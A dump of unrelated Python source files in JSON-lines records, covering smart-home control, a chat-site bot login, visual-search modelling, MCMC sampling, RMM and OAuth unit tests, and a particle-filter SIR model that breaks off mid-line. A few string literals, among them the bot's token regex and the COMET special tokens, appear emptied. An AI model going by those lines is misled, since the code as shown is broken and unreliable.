def _hm_control_mode(self):\n \"\"\"Return Control mode.\"\"\"\n if HMIP_CONTROL_MODE in self._data:\n return self._data[HMIP_CONTROL_MODE]\n # Homematic\n return self._data[\"CONTROL_MODE\"]\n\n def _init_data_struct(self):\n \"\"\"Generate a data dict (self._data) from the Homematic metadata.\"\"\"\n self._state = next(iter(self._hmdevice.WRITENODE.keys()))\n self._data[self._state] = None\n\n if (\n HM_CONTROL_MODE in self._hmdevice.ATTRIBUTENODE\n or HMIP_CONTROL_MODE in 
self._hmdevice.ATTRIBUTENODE\n ):\n self._data[HM_CONTROL_MODE] = None\n\n for node in self._hmdevice.SENSORNODE.keys():\n self._data[node] = None\n"} {"ext": "py", "sha": "1a2f643387f6c7bd230bc3199ccef4cb9b4c0248", "content": "import os,re\nimport requests\nimport time\nimport json\n\n\nclass Connect(object):\n def __init__(self, name='Athus', icon=\"Zaika\"):\n self.name = name\n self.icon = icon\n self.session = requests.session()\n\n def save_cookie(self, file_name):\n f = open(file_name, 'w+')\n f.write(str(self.session.cookies.get_dict()))\n f.close()\n\n def login(self):\n home = self.session.get('https://drrr.com',headers={'User-Agent': 'Bot'})\n token = re.search('', home.text).group(0)[-34:-2]\n home.close()\n login_body = {\n 'name': self.name,\n 'login': 'ENTER',\n 'token': token,\n 'direct-join': '',\n 'language': 'en-US',\n 'icon': self.icon\n }\n li = self.session.post('https://drrr.com', login_body, headers={'User-Agent': 'Bot'})\n li.close()"} {"ext": "py", "sha": "1a2f6502b0f0af6974f54b5c71da4c379fa3cecb", "content": "from GlobalConstants import N_ROWS, N_COLS, FEATURE_COLOUR, FEATURE_SHAPE, FEATURE_SIZE, FEATURE_TEXT\r\nimport numpy as np\r\nfrom scipy.spatial import distance\r\nfrom DisplayGenerator import DisplayGenerator\r\n\r\n\r\nclass ObservationModel(object):\r\n\r\n def sample(self, action, current_display):\r\n \"\"\"\r\n Samples a random observation from a given display.\r\n :param seed:\r\n :return: 2D array with colour and shape noisy observation\r\n \"\"\"\r\n x = action / N_COLS\r\n y = action % N_COLS\r\n obs_space_col = self.observe_feature(current_display, x, y, FEATURE_COLOUR)\r\n obs_space_shp = self.observe_feature(current_display, x, y, FEATURE_SHAPE)\r\n obs_space_size = self.observe_feature(current_display, x, y, FEATURE_SIZE)\r\n obs_space_text = self.observe_feature(current_display, x, y, FEATURE_TEXT)\r\n\r\n return obs_space_col, obs_space_shp, obs_space_size, obs_space_text\r\n\r\n def observe_feature(self, display, x, y, feature):\r\n observation = self.add_feature_noise(display, x, y, feature)\r\n\r\n #observation = self.add_spatial_noise(temp, x, y, global_variables)\r\n\r\n return observation\r\n\r\n def add_feature_noise(self, features, x, y, feature):\r\n obs_space = np.ones((N_ROWS, N_COLS)) * -1\r\n\r\n #for COLOUR.\r\n if feature == FEATURE_COLOUR:\r\n for ext_x in range(0, N_ROWS, 1):\r\n for ext_y in range(0, N_COLS, 1):\r\n e = self.get_eccentricity(features.x[x][y], features.y[x][y],\r\n features.x[ext_x][ext_y], features.y[ext_x][ext_y])\r\n mu = 0.05 + (0.2*e) + (0*e*e) + (0.0004*e*e*e)\r\n if features.objects[ext_x][ext_y].color != \"BLANK\":\r\n if features.objects[ext_x][ext_y].size > np.random.normal(mu,0.5,1)[0]:\r\n if features.objects[ext_x][ext_y].color == features.target.color:\r\n obs_space[ext_x][ext_y] = 1\r\n else:\r\n obs_space[ext_x][ext_y] = 0\r\n\r\n #for SHAPE.\r\n if feature == FEATURE_SHAPE:\r\n for ext_x in range(0, N_ROWS, 1):\r\n for ext_y in range(0, N_COLS, 1):\r\n e = self.get_eccentricity(features.x[x][y], features.y[x][y],\r\n features.x[ext_x][ext_y], features.y[ext_x][ext_y])\r\n mu = 0.05 + (0.2*e) + (0*e*e) + (0.025*e*e*e)\r\n if features.objects[ext_x][ext_y].color != \"BLANK\":\r\n if features.objects[ext_x][ext_y].size > np.random.normal(mu,0.5,1)[0]:\r\n if features.objects[ext_x][ext_y].shape == features.target.shape:\r\n obs_space[ext_x][ext_y] = 1\r\n else:\r\n obs_space[ext_x][ext_y] = 0\r\n\r\n #for SIZE.\r\n if feature == FEATURE_SIZE:\r\n for ext_x in range(0, N_ROWS, 1):\r\n for ext_y 
in range(0, N_COLS, 1):\r\n e = self.get_eccentricity(features.x[x][y], features.y[x][y],\r\n features.x[ext_x][ext_y], features.y[ext_x][ext_y])\r\n mu = 0.05 + (0.2*e) + (0*e*e) + (0.0004*e*e*e)\r\n if features.objects[ext_x][ext_y].color != \"BLANK\":\r\n if features.objects[ext_x][ext_y].size > np.random.normal(mu,0.5,1)[0]:\r\n if features.objects[ext_x][ext_y].size == features.target.size:\r\n obs_space[ext_x][ext_y] = 1\r\n else:\r\n obs_space[ext_x][ext_y] = 0\r\n\r\n #for TEXT.\r\n if feature == FEATURE_TEXT:\r\n for ext_x in range(0, N_ROWS, 1):\r\n for ext_y in range(0, N_COLS, 1):\r\n e = self.get_eccentricity(features.x[x][y], features.y[x][y],\r\n features.x[ext_x][ext_y], features.y[ext_x][ext_y])\r\n mu = 0.05 + (0.1*e) + (0*e*e) + (0.05*e*e*e)\r\n if features.objects[ext_x][ext_y].color != \"BLANK\":\r\n if .26 > np.random.normal(mu,1.0,1)[0]:\r\n if features.objects[ext_x][ext_y].text == features.target.text:\r\n obs_space[ext_x][ext_y] = 1\r\n else:\r\n obs_space[ext_x][ext_y] = 0\r\n\r\n return obs_space\r\n\r\n def get_eccentricity(self, fix_x, fix_y, ext_x, ext_y):\r\n return distance.euclidean([fix_x, fix_y], [ext_x, ext_y])\r\n\r\n\r\n#gen = DisplayGenerator()\r\n\r\n#env = gen.sample()\r\n\r\n#space = np.ones((N_ROWS, N_COLS)) * -1\r\n#print env.target\r\n#for ext_x in range(0, N_ROWS, 1):\r\n# for ext_y in range(0, N_COLS, 1):\r\n# if env.objects[ext_x][ext_y].text == env.target.text:\r\n# space[ext_x][ext_y] = 1\r\n\r\n#print space\r\n#print \"------------\"\r\n#model = ObservationModel()\r\n\r\n#col, shp, size, txt = model.sample(0, env)\r\n#print txt\r\n#print \"------------\"\r\n#col, shp, size, txt = model.sample(10, env)\r\n#print txt\r\n#print \"------------\"\r\n#col, shp, size, txt = model.sample(38, env)\r\n#print txt\r\n#print \"------------\"\r\n#col, shp, size, txt = model.sample(70, env)\r\n#print txt\r\n#print \"------------\"\r\n#col, shp, size, txt = model.sample(76, env)\r\n\r\n#print txt"} {"ext": "py", "sha": "1a2f6603f13d1021c92282b072a8ec83bbe50b05", "content": "\n# http://people.duke.edu/~ccc14/sta-663-2016/16A_MCMC.html\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy import stats\n\n\nthetas = np.linspace(0, 1, 200)\n\n\n\nn = 100\nh = 61\na = 10\nb = 10\n\n\n\n\n\ndef target(lik, prior, n, h, theta):\n if theta < 0 or theta > 1:\n return 0\n else:\n return lik(n, theta).pmf(h)*prior.pdf(theta)\n\ndef mh_coin(niters, n, h, theta, lik, prior, sigma):\n samples = [theta]\n while len(samples) < niters:\n theta_p = theta + stats.norm(0, sigma).rvs()\n rho = min(1, target(lik, prior, n, h, theta_p)/target(lik, prior, n, h, theta ))\n u = np.random.uniform()\n if u < rho:\n theta = theta_p\n samples.append(theta)\n return samples\n\n\nlik = stats.binom\nprior = stats.beta(a, b)\nsigma = 0.05\nniters = 100\n\nsampless = [mh_coin(niters, n, h, theta, lik, prior, sigma) for theta in np.arange(0.1, 1, 0.2)]\n\n\nfor samples in sampless:\n plt.plot(samples, '-o')\nplt.xlim([0, niters])\nplt.ylim([0, 1]);"} {"ext": "py", "sha": "1a2f6622255bf45a2dae7055f355c247c3f4b237", "content": "import datetime as dt\nfrom unittest.mock import patch, call\nfrom model_bakery import baker\nfrom django.utils import timezone as djangotime\n\nfrom tacticalrmm.test import TacticalTestCase\n\nfrom .models import AutomatedTask\nfrom logs.models import PendingAction\nfrom .serializers import AutoTaskSerializer\nfrom .tasks import remove_orphaned_win_tasks, run_win_task, create_win_task_schedule\n\n\nclass TestAutotaskViews(TacticalTestCase):\n def 
setUp(self):\n self.authenticate()\n self.setup_coresettings()\n\n @patch(\"automation.tasks.generate_agent_tasks_from_policies_task.delay\")\n @patch(\"autotasks.tasks.create_win_task_schedule.delay\")\n def test_add_autotask(\n self, create_win_task_schedule, generate_agent_tasks_from_policies_task\n ):\n url = \"/tasks/automatedtasks/\"\n\n # setup data\n script = baker.make_recipe(\"scripts.script\")\n agent = baker.make_recipe(\"agents.agent\")\n policy = baker.make(\"automation.Policy\")\n check = baker.make_recipe(\"checks.diskspace_check\", agent=agent)\n\n # test script set to invalid pk\n data = {\"autotask\": {\"script\": 500}}\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test invalid policy\n data = {\"autotask\": {\"script\": script.id}, \"policy\": 500}\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test invalid agent\n data = {\n \"autotask\": {\"script\": script.id},\n \"agent\": 500,\n }\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test add task to agent\n data = {\n \"autotask\": {\n \"name\": \"Test Task Scheduled with Assigned Check\",\n \"run_time_days\": [\"Sunday\", \"Monday\", \"Friday\"],\n \"run_time_minute\": \"10:00\",\n \"timeout\": 120,\n \"enabled\": True,\n \"script\": script.id,\n \"script_args\": None,\n \"task_type\": \"scheduled\",\n \"assigned_check\": check.id,\n },\n \"agent\": agent.id,\n }\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n\n create_win_task_schedule.assert_called()\n\n # test add task to policy\n data = {\n \"autotask\": {\n \"name\": \"Test Task Manual\",\n \"run_time_days\": [],\n \"timeout\": 120,\n \"enabled\": True,\n \"script\": script.id,\n \"script_args\": None,\n \"task_type\": \"manual\",\n \"assigned_check\": None,\n },\n \"policy\": policy.id,\n }\n\n resp = self.client.post(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n\n generate_agent_tasks_from_policies_task.assert_called_with(policy.id)\n\n self.check_not_authenticated(\"post\", url)\n\n def test_get_autotask(self):\n\n # setup data\n agent = baker.make_recipe(\"agents.agent\")\n baker.make(\"autotasks.AutomatedTask\", agent=agent, _quantity=3)\n\n url = f\"/tasks/{agent.id}/automatedtasks/\"\n\n resp = self.client.get(url, format=\"json\")\n serializer = AutoTaskSerializer(agent)\n\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.data, serializer.data)\n\n self.check_not_authenticated(\"get\", url)\n\n @patch(\"autotasks.tasks.enable_or_disable_win_task.delay\")\n @patch(\"automation.tasks.update_policy_task_fields_task.delay\")\n def test_update_autotask(\n self, update_policy_task_fields_task, enable_or_disable_win_task\n ):\n # setup data\n agent = baker.make_recipe(\"agents.agent\")\n agent_task = baker.make(\"autotasks.AutomatedTask\", agent=agent)\n policy = baker.make(\"automation.Policy\")\n policy_task = baker.make(\"autotasks.AutomatedTask\", policy=policy)\n\n # test invalid url\n resp = self.client.patch(\"/tasks/500/automatedtasks/\", format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n url = f\"/tasks/{agent_task.id}/automatedtasks/\"\n\n # test editing agent task\n data = {\"enableordisable\": False}\n\n resp = self.client.patch(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n enable_or_disable_win_task.assert_called_with(pk=agent_task.id, action=False)\n\n 
url = f\"/tasks/{policy_task.id}/automatedtasks/\"\n\n # test editing policy task\n data = {\"enableordisable\": True}\n\n resp = self.client.patch(url, data, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n update_policy_task_fields_task.assert_called_with(policy_task.id, True)\n\n self.check_not_authenticated(\"patch\", url)\n\n @patch(\"autotasks.tasks.delete_win_task_schedule.delay\")\n @patch(\"automation.tasks.delete_policy_autotask_task.delay\")\n def test_delete_autotask(\n self, delete_policy_autotask_task, delete_win_task_schedule\n ):\n # setup data\n agent = baker.make_recipe(\"agents.agent\")\n agent_task = baker.make(\"autotasks.AutomatedTask\", agent=agent)\n policy = baker.make(\"automation.Policy\")\n policy_task = baker.make(\"autotasks.AutomatedTask\", policy=policy)\n\n # test invalid url\n resp = self.client.delete(\"/tasks/500/automatedtasks/\", format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test delete agent task\n url = f\"/tasks/{agent_task.id}/automatedtasks/\"\n resp = self.client.delete(url, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n delete_win_task_schedule.assert_called_with(pk=agent_task.id)\n\n # test delete policy task\n url = f\"/tasks/{policy_task.id}/automatedtasks/\"\n resp = self.client.delete(url, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n delete_policy_autotask_task.assert_called_with(policy_task.id)\n\n self.check_not_authenticated(\"delete\", url)\n\n @patch(\"agents.models.Agent.nats_cmd\")\n def test_run_autotask(self, nats_cmd):\n # setup data\n agent = baker.make_recipe(\"agents.agent\", version=\"1.1.0\")\n task = baker.make(\"autotasks.AutomatedTask\", agent=agent)\n\n # test invalid url\n resp = self.client.get(\"/tasks/runwintask/500/\", format=\"json\")\n self.assertEqual(resp.status_code, 404)\n\n # test run agent task\n url = f\"/tasks/runwintask/{task.id}/\"\n resp = self.client.get(url, format=\"json\")\n self.assertEqual(resp.status_code, 200)\n nats_cmd.assert_called_with({\"func\": \"runtask\", \"taskpk\": task.id}, wait=False)\n nats_cmd.reset_mock()\n\n old_agent = baker.make_recipe(\"agents.agent\", version=\"1.0.2\")\n task2 = baker.make(\"autotasks.AutomatedTask\", agent=old_agent)\n url = f\"/tasks/runwintask/{task2.id}/\"\n resp = self.client.get(url, format=\"json\")\n self.assertEqual(resp.status_code, 400)\n nats_cmd.assert_not_called()\n\n self.check_not_authenticated(\"get\", url)\n\n\nclass TestAutoTaskCeleryTasks(TacticalTestCase):\n def setUp(self):\n self.authenticate()\n self.setup_coresettings()\n\n @patch(\"agents.models.Agent.nats_cmd\")\n def test_remove_orphaned_win_task(self, nats_cmd):\n self.agent = baker.make_recipe(\"agents.agent\")\n self.task1 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 1\",\n win_task_name=AutomatedTask.generate_task_name(),\n )\n\n # test removing an orphaned task\n win_tasks = [\n \"Adobe Acrobat Update Task\",\n \"AdobeGCInvoker-1.0\",\n \"GoogleUpdateTaskMachineCore\",\n \"GoogleUpdateTaskMachineUA\",\n \"OneDrive Standalone Update Task-S-1-5-21-717461175-241712648-1206041384-1001\",\n self.task1.win_task_name,\n \"TacticalRMM_fixmesh\",\n \"TacticalRMM_SchedReboot_jk324kajd\",\n \"TacticalRMM_iggrLcOaldIZnUzLuJWPLNwikiOoJJHHznb\", # orphaned task\n ]\n\n self.calls = [\n call({\"func\": \"listschedtasks\"}, timeout=10),\n call(\n {\n \"func\": \"delschedtask\",\n \"schedtaskpayload\": {\n \"name\": \"TacticalRMM_iggrLcOaldIZnUzLuJWPLNwikiOoJJHHznb\"\n },\n },\n timeout=10,\n ),\n ]\n\n 
nats_cmd.side_effect = [win_tasks, \"ok\"]\n ret = remove_orphaned_win_tasks.s(self.agent.pk).apply()\n self.assertEqual(nats_cmd.call_count, 2)\n nats_cmd.assert_has_calls(self.calls)\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # test nats delete task fail\n nats_cmd.reset_mock()\n nats_cmd.side_effect = [win_tasks, \"error deleting task\"]\n ret = remove_orphaned_win_tasks.s(self.agent.pk).apply()\n nats_cmd.assert_has_calls(self.calls)\n self.assertEqual(nats_cmd.call_count, 2)\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # no orphaned tasks\n nats_cmd.reset_mock()\n win_tasks.remove(\"TacticalRMM_iggrLcOaldIZnUzLuJWPLNwikiOoJJHHznb\")\n nats_cmd.side_effect = [win_tasks, \"ok\"]\n ret = remove_orphaned_win_tasks.s(self.agent.pk).apply()\n self.assertEqual(nats_cmd.call_count, 1)\n self.assertEqual(ret.status, \"SUCCESS\")\n\n @patch(\"agents.models.Agent.nats_cmd\")\n def test_run_win_task(self, nats_cmd):\n self.agent = baker.make_recipe(\"agents.agent\")\n self.task1 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 1\",\n win_task_name=AutomatedTask.generate_task_name(),\n )\n nats_cmd.return_value = \"ok\"\n ret = run_win_task.s(self.task1.pk).apply()\n self.assertEqual(ret.status, \"SUCCESS\")\n\n @patch(\"agents.models.Agent.nats_cmd\")\n def test_create_win_task_schedule(self, nats_cmd):\n self.agent = baker.make_recipe(\"agents.agent\")\n\n task_name = AutomatedTask.generate_task_name()\n # test scheduled task\n self.task1 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 1\",\n win_task_name=task_name,\n task_type=\"scheduled\",\n run_time_bit_weekdays=127,\n run_time_minute=\"21:55\",\n )\n self.assertEqual(self.task1.sync_status, \"notsynced\")\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task1.pk, pending_action=False).apply()\n self.assertEqual(nats_cmd.call_count, 1)\n nats_cmd.assert_called_with(\n {\n \"func\": \"schedtask\",\n \"schedtaskpayload\": {\n \"type\": \"rmm\",\n \"trigger\": \"weekly\",\n \"weekdays\": 127,\n \"pk\": self.task1.pk,\n \"name\": task_name,\n \"hour\": 21,\n \"min\": 55,\n },\n },\n timeout=10,\n )\n self.task1 = AutomatedTask.objects.get(pk=self.task1.pk)\n self.assertEqual(self.task1.sync_status, \"synced\")\n\n nats_cmd.return_value = \"timeout\"\n ret = create_win_task_schedule.s(pk=self.task1.pk, pending_action=False).apply()\n self.assertEqual(ret.status, \"SUCCESS\")\n self.task1 = AutomatedTask.objects.get(pk=self.task1.pk)\n self.assertEqual(self.task1.sync_status, \"notsynced\")\n\n # test pending action\n self.pending_action = PendingAction.objects.create(\n agent=self.agent, action_type=\"taskaction\"\n )\n self.assertEqual(self.pending_action.status, \"pending\")\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(\n pk=self.task1.pk, pending_action=self.pending_action.pk\n ).apply()\n self.assertEqual(ret.status, \"SUCCESS\")\n self.pending_action = PendingAction.objects.get(pk=self.pending_action.pk)\n self.assertEqual(self.pending_action.status, \"completed\")\n\n # test runonce with future date\n nats_cmd.reset_mock()\n task_name = AutomatedTask.generate_task_name()\n run_time_date = djangotime.now() + djangotime.timedelta(hours=22)\n self.task2 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 2\",\n win_task_name=task_name,\n task_type=\"runonce\",\n run_time_date=run_time_date,\n )\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task2.pk, pending_action=False).apply()\n 
nats_cmd.assert_called_with(\n {\n \"func\": \"schedtask\",\n \"schedtaskpayload\": {\n \"type\": \"rmm\",\n \"trigger\": \"once\",\n \"pk\": self.task2.pk,\n \"name\": task_name,\n \"year\": int(dt.datetime.strftime(self.task2.run_time_date, \"%Y\")),\n \"month\": dt.datetime.strftime(self.task2.run_time_date, \"%B\"),\n \"day\": int(dt.datetime.strftime(self.task2.run_time_date, \"%d\")),\n \"hour\": int(dt.datetime.strftime(self.task2.run_time_date, \"%H\")),\n \"min\": int(dt.datetime.strftime(self.task2.run_time_date, \"%M\")),\n },\n },\n timeout=10,\n )\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # test runonce with date in the past\n nats_cmd.reset_mock()\n task_name = AutomatedTask.generate_task_name()\n run_time_date = djangotime.now() - djangotime.timedelta(days=13)\n self.task3 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 3\",\n win_task_name=task_name,\n task_type=\"runonce\",\n run_time_date=run_time_date,\n )\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task3.pk, pending_action=False).apply()\n self.task3 = AutomatedTask.objects.get(pk=self.task3.pk)\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # test checkfailure\n nats_cmd.reset_mock()\n self.check = baker.make_recipe(\"checks.diskspace_check\", agent=self.agent)\n task_name = AutomatedTask.generate_task_name()\n self.task4 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 4\",\n win_task_name=task_name,\n task_type=\"checkfailure\",\n assigned_check=self.check,\n )\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task4.pk, pending_action=False).apply()\n nats_cmd.assert_called_with(\n {\n \"func\": \"schedtask\",\n \"schedtaskpayload\": {\n \"type\": \"rmm\",\n \"trigger\": \"manual\",\n \"pk\": self.task4.pk,\n \"name\": task_name,\n },\n },\n timeout=10,\n )\n self.assertEqual(ret.status, \"SUCCESS\")\n\n # test manual\n nats_cmd.reset_mock()\n task_name = AutomatedTask.generate_task_name()\n self.task5 = AutomatedTask.objects.create(\n agent=self.agent,\n name=\"test task 5\",\n win_task_name=task_name,\n task_type=\"manual\",\n )\n nats_cmd.return_value = \"ok\"\n ret = create_win_task_schedule.s(pk=self.task5.pk, pending_action=False).apply()\n nats_cmd.assert_called_with(\n {\n \"func\": \"schedtask\",\n \"schedtaskpayload\": {\n \"type\": \"rmm\",\n \"trigger\": \"manual\",\n \"pk\": self.task5.pk,\n \"name\": task_name,\n },\n },\n timeout=10,\n )\n self.assertEqual(ret.status, \"SUCCESS\")\n"} {"ext": "py", "sha": "1a2f66bc368cdfd73df0a7a327e51fefc29f6d3d", "content": "\"\"\"Ensure credentials are preserved through the authorization.\n\nThe Authorization Code Grant will need to preserve state as well as redirect\nuri and the Implicit Grant will need to preserve state.\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport json\n\nimport mock\n\nfrom oauthlib.oauth2 import (MobileApplicationServer, RequestValidator,\n WebApplicationServer)\nfrom oauthlib.oauth2.rfc6749 import errors\n\nfrom ....unittest import TestCase\nfrom .test_utils import get_fragment_credentials, get_query_credentials\n\n\nclass PreservationTest(TestCase):\n\n DEFAULT_REDIRECT_URI = 'http://i.b./path'\n\n def setUp(self):\n self.validator = mock.MagicMock(spec=RequestValidator)\n self.validator.get_default_redirect_uri.return_value = self.DEFAULT_REDIRECT_URI\n self.validator.get_code_challenge.return_value = None\n self.validator.authenticate_client.side_effect = self.set_client\n self.web = 
WebApplicationServer(self.validator)\n self.mobile = MobileApplicationServer(self.validator)\n\n def set_state(self, state):\n def set_request_state(client_id, code, client, request):\n request.state = state\n return True\n return set_request_state\n\n def set_client(self, request):\n request.client = mock.MagicMock()\n request.client.client_id = 'mocked'\n return True\n\n def test_state_preservation(self):\n auth_uri = 'http://example.com/path?state=xyz&client_id=abc&response_type='\n token_uri = 'http://example.com/path'\n\n # authorization grant\n h, _, s = self.web.create_authorization_response(\n auth_uri + 'code', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n code = get_query_credentials(h['Location'])['code'][0]\n self.validator.validate_code.side_effect = self.set_state('xyz')\n _, body, _ = self.web.create_token_response(token_uri,\n body='grant_type=authorization_code&code=%s' % code)\n self.assertEqual(json.loads(body)['state'], 'xyz')\n\n # implicit grant\n h, _, s = self.mobile.create_authorization_response(\n auth_uri + 'token', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n self.assertEqual(get_fragment_credentials(h['Location'])['state'][0], 'xyz')\n\n def test_redirect_uri_preservation(self):\n auth_uri = 'http://example.com/path?redirect_uri=http%3A%2F%2Fi.b%2Fpath&client_id=abc'\n redirect_uri = 'http://i.b/path'\n token_uri = 'http://example.com/path'\n\n # authorization grant\n h, _, s = self.web.create_authorization_response(\n auth_uri + '&response_type=code', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n self.assertTrue(h['Location'].startswith(redirect_uri))\n\n # confirm_redirect_uri should return false if the redirect uri\n # was given in the authorization but not in the token request.\n self.validator.confirm_redirect_uri.return_value = False\n code = get_query_credentials(h['Location'])['code'][0]\n _, body, _ = self.web.create_token_response(token_uri,\n body='grant_type=authorization_code&code=%s' % code)\n self.assertEqual(json.loads(body)['error'], 'invalid_request')\n\n # implicit grant\n h, _, s = self.mobile.create_authorization_response(\n auth_uri + '&response_type=token', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n self.assertTrue(h['Location'].startswith(redirect_uri))\n\n def test_invalid_redirect_uri(self):\n auth_uri = 'http://example.com/path?redirect_uri=http%3A%2F%2Fi.b%2Fpath&client_id=abc'\n self.validator.validate_redirect_uri.return_value = False\n\n # authorization grant\n self.assertRaises(errors.MismatchingRedirectURIError,\n self.web.create_authorization_response,\n auth_uri + '&response_type=code', scopes=['random'])\n\n # implicit grant\n self.assertRaises(errors.MismatchingRedirectURIError,\n self.mobile.create_authorization_response,\n auth_uri + '&response_type=token', scopes=['random'])\n\n def test_default_uri(self):\n auth_uri = 'http://example.com/path?state=xyz&client_id=abc'\n\n self.validator.get_default_redirect_uri.return_value = None\n\n # authorization grant\n self.assertRaises(errors.MissingRedirectURIError,\n self.web.create_authorization_response,\n auth_uri + '&response_type=code', scopes=['random'])\n\n # implicit grant\n self.assertRaises(errors.MissingRedirectURIError,\n self.mobile.create_authorization_response,\n auth_uri + '&response_type=token', scopes=['random'])\n\n def test_default_uri_in_token(self):\n auth_uri = 'http://example.com/path?state=xyz&client_id=abc'\n token_uri = 
'http://example.com/path'\n\n # authorization grant\n h, _, s = self.web.create_authorization_response(\n auth_uri + '&response_type=code', scopes=['random'])\n self.assertEqual(s, 302)\n self.assertIn('Location', h)\n self.assertTrue(h['Location'].startswith(self.DEFAULT_REDIRECT_URI))\n\n # confirm_redirect_uri should return true if the redirect uri\n # was not given in the authorization AND not in the token request.\n self.validator.confirm_redirect_uri.return_value = True\n code = get_query_credentials(h['Location'])['code'][0]\n self.validator.validate_code.side_effect = self.set_state('xyz')\n _, body, s = self.web.create_token_response(token_uri,\n body='grant_type=authorization_code&code=%s' % code)\n self.assertEqual(s, 200)\n self.assertEqual(self.validator.confirm_redirect_uri.call_args[0][2], self.DEFAULT_REDIRECT_URI)\n"} {"ext": "py", "sha": "1a2f6839de35c5142ce239003142bdb6ce9a9cdf", "content": "import os\r\nimport src.data.atomic as atomic_data\r\nimport src.data.conceptnet as conceptnet_data\r\nimport src.data.config as cfg\r\n\r\nimport utils.utils as utils\r\n\r\nimport pickle\r\nimport torch\r\nimport json\r\n\r\n\r\nstart_token = \"\"\r\nend_token = \"\"\r\nblank_token = \"\"\r\n\r\n\r\ndef save_checkpoint(state, filename):\r\n print(\"Saving model to {}\".format(filename))\r\n torch.save(state, filename)\r\n\r\n\r\ndef save_step(model, vocab, optimizer, opt, length, lrs):\r\n if cfg.test_save:\r\n name = \"{}.pickle\".format(utils.make_name(\r\n opt, prefix=\"garbage/models/\", is_dir=False, eval_=True))\r\n else:\r\n name = \"{}.pickle\".format(utils.make_name(\r\n opt, prefix=\"models/\", is_dir=False, eval_=True))\r\n save_checkpoint({\r\n \"epoch\": length, \"state_dict\": model.state_dict(),\r\n \"optimizer\": optimizer.state_dict(), \"opt\": opt,\r\n \"vocab\": vocab, \"epoch_learning_rates\": lrs},\r\n name)\r\n\r\n\r\ndef save_eval_file(opt, stats, eval_type=\"losses\", split=\"dev\", ext=\"pickle\"):\r\n if cfg.test_save:\r\n name = \"{}/{}.{}\".format(utils.make_name(\r\n opt, prefix=\"garbage/{}/\".format(eval_type),\r\n is_dir=True, eval_=True), split, ext)\r\n else:\r\n name = \"{}/{}.{}\".format(utils.make_name(\r\n opt, prefix=\"results/{}/\".format(eval_type),\r\n is_dir=True, eval_=True), split, ext)\r\n print(\"Saving {} {} to {}\".format(split, eval_type, name))\r\n\r\n if ext == \"pickle\":\r\n with open(name, \"wb\") as f:\r\n pickle.dump(stats, f)\r\n elif ext == \"txt\":\r\n with open(name, \"w\") as f:\r\n f.write(stats)\r\n elif ext == \"json\":\r\n with open(name, \"w\") as f:\r\n json.dump(stats, f)\r\n else:\r\n raise\r\n\r\n\r\ndef load_checkpoint(filename, gpu=True):\r\n if os.path.exists(filename):\r\n checkpoint = torch.load(\r\n filename, map_location=lambda storage, loc: storage)\r\n else:\r\n print(\"No model found at {}\".format(filename))\r\n return checkpoint\r\n\r\n\r\ndef make_data_loader(opt, *args):\r\n if opt.dataset == \"atomic\":\r\n return atomic_data.GenerationDataLoader(opt, *args)\r\n elif opt.dataset == \"conceptnet\":\r\n return conceptnet_data.GenerationDataLoader(opt, *args)\r\n\r\n\r\ndef set_max_sizes(data_loader, force_split=None):\r\n data_loader.total_size = {}\r\n if force_split is not None:\r\n data_loader.total_size[force_split] = \\\r\n data_loader.sequences[force_split][\"total\"].size(0)\r\n return\r\n for split in data_loader.sequences:\r\n data_loader.total_size[split] = \\\r\n data_loader.sequences[split][\"total\"].size(0)\r\n"} {"ext": "py", "sha": "1a2f68d3a0b65297a09c5e1d61db26e06853631f", 
"content": "from .sir import SIR\nfrom common.config import data_type\nfrom common.linalg import as_array, as_matrix, init_weights\nfrom common.stats import RSS, MSPE, RMSE\nfrom numpy.random import normal, uniform\nfrom numpy import *\nfrom filtering.particlefilter import ParticleFilter\n\n\nclass ParticleSIR(SIR):\n \n def __init__(self, num_enbs, params):\n self.num_enbs = num_enbs\n super(ParticleSIR, self).__init__(params)\n\n del self.alpha\n del self.beta\n \n self.current_Is = uniform(0, self.i * 2, num_enbs)\n self.current_Ss = ones(num_enbs) - self.current_Is\n self.alphas = uniform(0., 1, num_enbs)\n self.betas = uniform(0., 1, num_enbs)\n\n self.weights = [init_weights(num_enbs)] # matrix-like\n\n for i in range(num_enbs):\n if self.alphas[i] < self.betas[i]:\n self.alphas[i], self.betas[i] = self.betas[i], self.alphas[i] \n\n self.Is = [self.current_Is.tolist()]\n self.Ss = [self.current_Ss.tolist()]\n\n def update_states(self):\n for j in range(self.num_enbs):\n s = 